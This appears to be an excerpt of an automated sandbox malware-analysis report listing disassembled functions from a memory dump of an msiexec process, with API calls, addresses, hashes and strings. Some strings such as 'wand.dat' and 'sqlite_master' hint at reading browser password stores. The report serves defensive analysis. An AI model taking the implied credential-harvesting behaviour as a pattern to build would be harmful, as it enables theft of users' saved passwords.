                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateErrorHandleLastMappingView
                                                              • String ID:
                                                              • API String ID: 1661045500-0
                                                              • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                              • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                              • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                              • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                              APIs
                                                                • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                              • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                              Strings
                                                              • virtual tables may not be altered, xrefs: 0042EBD2
                                                              • Cannot add a column to a view, xrefs: 0042EBE8
                                                              • sqlite_altertab_%s, xrefs: 0042EC4C
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                              • API String ID: 1297977491-2063813899
                                                              • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                              • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                              • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                              • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                              APIs
                                                              • memset.MSVCRT ref: 0040560C
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                              • String ID: *.*$dat$wand.dat
                                                              • API String ID: 2618321458-1828844352
                                                              • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                              • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                              • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                              • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                              APIs
                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                              • wcslen.MSVCRT ref: 00410C74
                                                              • _wtoi.MSVCRT(?), ref: 00410C80
                                                              • _wcsicmp.MSVCRT ref: 00410CCE
                                                              • _wcsicmp.MSVCRT ref: 00410CDF
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                              • String ID:
                                                              • API String ID: 1549203181-0
                                                              • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                              • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                              • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                              • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                              APIs
                                                              • memset.MSVCRT ref: 00412057
                                                                • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                              • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                              • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                              • GetKeyState.USER32(00000010), ref: 0041210D
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                              • String ID:
                                                              • API String ID: 3550944819-0
                                                              • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                              • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                              • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                              • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                              APIs
                                                              • free.MSVCRT ref: 0040F561
                                                              • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                              • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$free
                                                              • String ID: g4@
                                                              • API String ID: 2888793982-2133833424
                                                              • Opcode ID: 1c343f7a35281392d928e4566ae7c5833a23178c5394654a954516dd691eefaa
                                                              • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                              • Opcode Fuzzy Hash: 1c343f7a35281392d928e4566ae7c5833a23178c5394654a954516dd691eefaa
                                                              • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                              APIs
                                                              • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                              • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                              • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: @
                                                              • API String ID: 3510742995-2766056989
                                                              • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                              • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                              • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                              • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                              APIs
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                              • memset.MSVCRT ref: 0040AF18
                                                              • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@memcpymemset
                                                              • String ID:
                                                              • API String ID: 1865533344-0
                                                              • Opcode ID: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                              • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                              • Opcode Fuzzy Hash: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                              • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                              APIs
                                                              • memset.MSVCRT ref: 004144E7
                                                                • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                              • memset.MSVCRT ref: 0041451A
                                                              • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                              • String ID:
                                                              • API String ID: 1127616056-0
                                                              • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                              • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                              • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                              • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                              APIs
                                                              • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                              • memset.MSVCRT ref: 0042FED3
                                                              • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID: sqlite_master
                                                              • API String ID: 438689982-3163232059
                                                              • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                              • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                              • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                              • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                              APIs
                                                              • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                              • wcscpy.MSVCRT ref: 00414DF3
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: BrowseFolderFromListMallocPathwcscpy
                                                              • String ID:
                                                              • API String ID: 3917621476-0
                                                              • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                              • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                              • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                              • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                              APIs
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                              • _snwprintf.MSVCRT ref: 00410FE1
                                                              • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                              • _snwprintf.MSVCRT ref: 0041100C
                                                              • wcscat.MSVCRT ref: 0041101F
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                              • String ID:
                                                              • API String ID: 822687973-0
                                                              • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                              • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                              • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                              • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                              APIs
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                                                              • malloc.MSVCRT ref: 00417459
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7622DF80,?,0041755F,?), ref: 00417478
                                                              • free.MSVCRT ref: 0041747F
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$freemalloc
                                                              • String ID:
                                                              • API String ID: 2605342592-0
                                                              • Opcode ID: 4f6da64b03b6c84002c909cf9dcc8042fee6eba1d3d37644ca2334bf0aecddb0
                                                              • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                              • Opcode Fuzzy Hash: 4f6da64b03b6c84002c909cf9dcc8042fee6eba1d3d37644ca2334bf0aecddb0
                                                              • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                              • RegisterClassW.USER32(?), ref: 00412428
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                              • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: HandleModule$ClassCreateRegisterWindow
                                                              • String ID:
                                                              • API String ID: 2678498856-0
                                                              • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                              • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                              • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                              • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                              APIs
                                                              • GetDlgItem.USER32(?,?), ref: 00409B40
                                                              • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                              • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                              • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Item
                                                              • String ID:
                                                              • API String ID: 3888421826-0
                                                              • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                              • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                              • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                              • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                              APIs
                                                              • memset.MSVCRT ref: 00417B7B
                                                              • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                              • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                              • GetLastError.KERNEL32 ref: 00417BB5
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$ErrorLastLockUnlockmemset
                                                              • String ID:
                                                              • API String ID: 3727323765-0
                                                              • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                              • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                              • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                              • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                              APIs
                                                              • memset.MSVCRT ref: 0040F673
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                              • strlen.MSVCRT ref: 0040F6A2
                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                              • String ID:
                                                              • API String ID: 2754987064-0
                                                              • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                              • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                              • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                              • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                              APIs
                                                              • memset.MSVCRT ref: 0040F6E2
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                              • strlen.MSVCRT ref: 0040F70D
                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                              • String ID:
                                                              • API String ID: 2754987064-0
                                                              • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                              • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                              • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                              • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                              APIs
                                                              • memset.MSVCRT ref: 00402FD7
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                              • strlen.MSVCRT ref: 00403006
                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                              • String ID:
                                                              • API String ID: 2754987064-0
                                                              • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                              • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                              • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                              • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: wcscpy$CloseHandle
                                                              • String ID: General
                                                              • API String ID: 3722638380-26480598
                                                              • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                              • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                              • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                              • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                              APIs
                                                                • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                              • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                              • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                              • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                              • GetStockObject.GDI32(00000000), ref: 004143C6
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                              • String ID:
                                                              • API String ID: 764393265-0
                                                              • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                              • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                              • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                              • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                              APIs
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Time$System$File$LocalSpecific
                                                              • String ID:
                                                              • API String ID: 979780441-0
                                                              • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                              • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                              • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                              • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                              APIs
                                                              • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                              • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                              • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$DialogHandleModuleParam
                                                              • String ID:
                                                              • API String ID: 1386444988-0
                                                              • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                              • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                              • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                              • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
